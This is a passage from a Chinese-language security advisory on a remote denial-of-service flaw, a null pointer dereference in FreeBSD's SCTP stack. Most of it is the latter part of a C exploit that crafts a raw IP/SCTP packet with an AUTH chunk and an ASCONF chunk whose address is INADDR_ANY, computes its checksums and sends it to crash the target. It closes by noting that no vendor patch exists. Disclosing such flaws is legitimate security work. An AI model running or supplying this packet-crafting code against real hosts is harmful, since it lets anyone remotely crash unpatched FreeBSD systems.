FreeBSD SCTP空指针引用远程拒绝服务漏洞(4)

/* build AUTH chunk */
    auth_chunk = (void *)crash + sizeof(struct ip) + sizeof(struct sctphdr);
    auth_chunk->ch.type = SCTP_AUTH;
    auth_chunk->ch.length = htons(8 + sizeof(struct sctp_auth_chunk));
        auth_chunk->hmac_id = htons(0x1337);
        memset((void *)auth_chunk->hmac, 0x61, 8);
    
        /* build ASCONF chunk */
        asconf_chunk = (void *)crash + sizeof(struct ip) + sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk) + 8;
        asconf_chunk->ch.type = SCTP_ASCONF;
        asconf_chunk->ch.length = htons(sizeof(struct sctp_asconf_chunk) + sizeof(struct sctp_ipv4addr_param));
        asconf_chunk->serial = 0x41414141; /* whatever */
    
        ipv4_addr = (void *)crash + sizeof(struct ip) + sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk)
                                                                        + 8 + sizeof(struct sctp_asconf_chunk);
    
    ipv4_addr->ph.length = htons(sizeof(struct sctp_ipv4addr_param));
        ipv4_addr->ph.type = htons(0x0005);
        ipv4_addr->addr = INADDR_ANY; /* this takes us down the bad code path */
    
        /* what's the length of the whole packet? */
        iph->ip_len = sizeof(struct ip) + sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk) + 8 + sizeof(struct sctp_asconf_chunk)
                                                                                              + sizeof(struct sctp_ipv4addr_param);
    
        /* calculate IP checksum */
    iph->ip_sum = checksum((unsigned short *)crash, iph->ip_len >> 1);

/* calculate SCTP checksum */
    sctph->csum = htonl(sctp_crc32c((const unsigned char *)sctph, sizeof(struct sctphdr) + sizeof(struct sctp_auth_chunk) + 8
                                                                                           + sizeof(struct sctp_asconf_chunk)
                                                                                         + sizeof(struct sctp_ipv4addr_param)));

printf("[*] sending packet..\n\n");

/* send the bad packet */
    ret = sendto(sock, crash, iph->ip_len, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr));
    if(ret < 0) {
        printf("[*] error sending packet\n");
        return -1;
    }

printf("[*] done, bad packet sent!\n\n");

free(crash);
    close(sock);

return 0;

}

建议：
--------------------------------------------------------------------------------
厂商补丁：

FreeBSD
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：